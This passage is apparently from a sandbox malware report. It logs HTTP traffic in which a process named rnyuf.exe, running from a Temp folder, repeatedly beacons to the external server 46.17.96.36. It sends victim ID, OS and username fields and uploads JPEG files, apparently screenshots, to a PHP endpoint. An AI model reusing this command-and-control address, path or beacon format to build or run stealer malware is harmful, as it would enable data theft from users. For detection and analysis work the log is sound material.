                                        71192.168.2.44981046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:41.917011976 CEST8402OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----756f3da479f67c608b77a871878871ba
                                        Host: 46.17.96.36
                                        Content-Length: 111043
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:41.917108059 CEST8402OUTData Raw: 2d 2d 2d 2d 2d 2d 37 35 36 66 33 64 61 34 37 39 66 36 37 63 36 30 38 62 37 37 61 38 37 31 38 37 38 38 37 31 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------756f3da479f67c608b77a871878871baContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:41.917357922 CEST8413OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:41.917476892 CEST8415OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:41.950187922 CEST8421OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:41.950226068 CEST8424OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:41.950237036 CEST8429OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:41.950506926 CEST8441OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:41.984520912 CEST8444OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:41.984616041 CEST8457OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:41.985043049 CEST8468OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:42.093851089 CEST8514INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        72192.168.2.44980946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:41.918452978 CEST8415OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:41.995179892 CEST8490INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        73192.168.2.44981146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:42.215984106 CEST8515OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:42.291254997 CEST8515INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        74192.168.2.44981246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:42.481004953 CEST8516OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2527d6ee36e5d91ced907633b787976c
                                        Host: 46.17.96.36
                                        Content-Length: 110710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:42.481086969 CEST8516OUTData Raw: 2d 2d 2d 2d 2d 2d 32 35 32 37 64 36 65 65 33 36 65 35 64 39 31 63 65 64 39 30 37 36 33 33 62 37 38 37 39 37 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2527d6ee36e5d91ced907633b787976cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:42.481250048 CEST8526OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:42.481359005 CEST8529OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:42.514079094 CEST8532OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:42.514130116 CEST8538OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:42.514157057 CEST8550OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:42.514182091 CEST8555OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:42.547019005 CEST8571OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:42.547178030 CEST8592OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:42.547231913 CEST8600OUTData Raw: 8b 23 4b 57 3f bb 91 1b e8 e0 d3 0e 93 27 a3 81 ea 56 98 10 9e d5 66 18 6e 38 d8 5d 7e 87 15 0d ce 3d 4a 8c 94 b6 45 53 a5 cd fc 3b 4f d4 e2 98 da 65 d0 ff 00 96 4c 7d c5 6f c1 0d e1 c6 66 63 ec 79 ad 6b 68 2e 4e 32 a8 df 55 ac 27 8b 94 0e da 58
                                        Data Ascii: #KW?'Vfn8]~=JES;OeL}ofcykh.N2U'XgS&3nk<=b}0`htvG'=$&MbS*:fk s4*eA~"5b)Y#sC$:Xl,|Ju6t?;5dUgO
                                        Aug 29, 2021 22:27:42.649260998 CEST8628INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        75192.168.2.44981346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:42.498218060 CEST8529OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:42.570733070 CEST8606INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        76192.168.2.44981446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:42.782445908 CEST8629OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:42.859319925 CEST8629INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        77192.168.2.44981546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.022821903 CEST8630OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----7f467d4e70cc44d532fe453c2d3923e5
                                        Host: 46.17.96.36
                                        Content-Length: 111116
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:43.022887945 CEST8630OUTData Raw: 2d 2d 2d 2d 2d 2d 37 66 34 36 37 64 34 65 37 30 63 63 34 34 64 35 33 32 66 65 34 35 33 63 32 64 33 39 32 33 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------7f467d4e70cc44d532fe453c2d3923e5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:43.023046017 CEST8640OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:43.023099899 CEST8642OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:43.057071924 CEST8646OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:43.057182074 CEST8668OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:43.089518070 CEST8671OUTData Raw: 9f 77 71 71 6f 32 4d 6e f6 d7 9e 46 d2 a7 38 6f 91 b2 09 c7 4d a7 af 3e 9d 15 6f ca f9 4c 29 db 9b 52 d9 87 42 d3 2d 2c 5f 53 8f 53 b9 96 fa 33 70 a2 da 54 84 43 06 f2 aa 48 64 6d ec 76 93 80 54 01 8e 4e 78 de b3 f0 6d 9c 71 3f db a1 d4 ae 23 5d
                                        Data Ascii: wqqo2MnF8oM>oL)RB-,_SS3pTCHdmvTNxmq?#]I%RXDq(($^`oDHHd1(ciSlo{%%f1mYMW;A+Wk:EO[?i!bmi*G;T*bAW]kZ$Piz
                                        Aug 29, 2021 22:27:43.089668036 CEST8674OUTData Raw: 26 ac 4e 5b 73 ff 00 c0 aa 84 9a 5d e4 67 e6 81 ff 00 2a ea 85 68 cb 79 23 8e 71 a8 b6 4c ce 16 98 ea eb 4e fb 32 0e af f9 0a b0 f6 f3 29 c1 8d 87 e1 51 94 61 d4 56 c9 a7 d4 c9 b9 75 18 21 88 7f 78 d3 82 c6 3a 20 fc 69 40 a2 aa c8 8b b1 72 07 45
                                        Data Ascii: &N[s]g*hy#qLN2)QaVu!x: i@rE1@Ci(!)Rd[zYkzzJhLe1f^|^vPrBQKCv/+Oi^Y(z"'$ Ai6#wn_
                                        Aug 29, 2021 22:27:43.089720964 CEST8700OUTData Raw: 4b de 81 0e fc 29 0d 19 a4 cd 00 2d 27 7a 51 4a 68 01 29 68 c5 14 c0 51 4a 29 05 28 a6 4b 16 8a 28 a6 21 d4 a2 9b 4e 14 d0 85 a5 a4 14 b4 c4 14 b4 94 50 48 e1 4e a6 53 85 50 98 ea 51 49 4b 54 26 2d 2d 20 14 b4 c9 1d 4e 14 ca 70 aa 24 75 28 a4 a5
                                        Data Ascii: K)-'zQJh)hQJ)(K(!NPHNSPQIKT&-- Np$u($vyN)CLdSGS<*,visLJ:*,u:(Uvj sN6`d)i8SF)c@S4Rhi;g6))%$x(%
                                        Aug 29, 2021 22:27:43.089864969 CEST8718OUTData Raw: c5 48 29 ad 84 c5 a5 14 94 a2 ad 10 2d 3a 92 8a 62 16 96 90 52 d5 08 29 45 14 84 e2 80 1e 0d 29 35 16 ea 51 96 34 ee 2b 0f 06 97 75 25 26 09 a0 5a 0e 06 9d 8c d2 05 a7 8a a4 4b 60 16 97 1c 53 85 3b 1c 55 d8 8b 8c 02 a4 55 e6 80 b4 fc 62 a9 22 5b
                                        Data Ascii: H)-:bR)E)5Q4+u%&ZK`S;UUb"[Sp)W MH&i0~)BH()qUb.7SOjv)S-NN)SNA76<[iMH\RS{S<!)*`(!%8GSA<A)vT)BR#-(.
                                        Aug 29, 2021 22:27:43.122010946 CEST8721OUTData Raw: 51 bf 69 da dc 64 30 0c a4 8e 7a 8e b5 c4 d9 dc 91 f6 7a 7f ab 5f a0 a7 53 53 fd 5a fd 05 3a b8 8e 90 a2 8a 28 00 a2 8a 28 00 a2 8a af 7f 75 f6 1d 3a ea ef 66 ff 00 22 17 97 66 71 bb 68 27 19 ed d2 80 2c 51 59 de 76 b3 ff 00 3e 16 1f f8 1a ff 00
                                        Data Ascii: Qid0zz_SSZ:((u:f"fqh',QYv>j;Y5@4Vw_Pk?aTEgyXk<g|,?5hYv>j;Y5@4Vw
                                        Aug 29, 2021 22:27:43.191549063 CEST8741INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        78192.168.2.44981646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:43.033591032 CEST8643OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:43.113495111 CEST8719INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        79192.168.2.44981746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
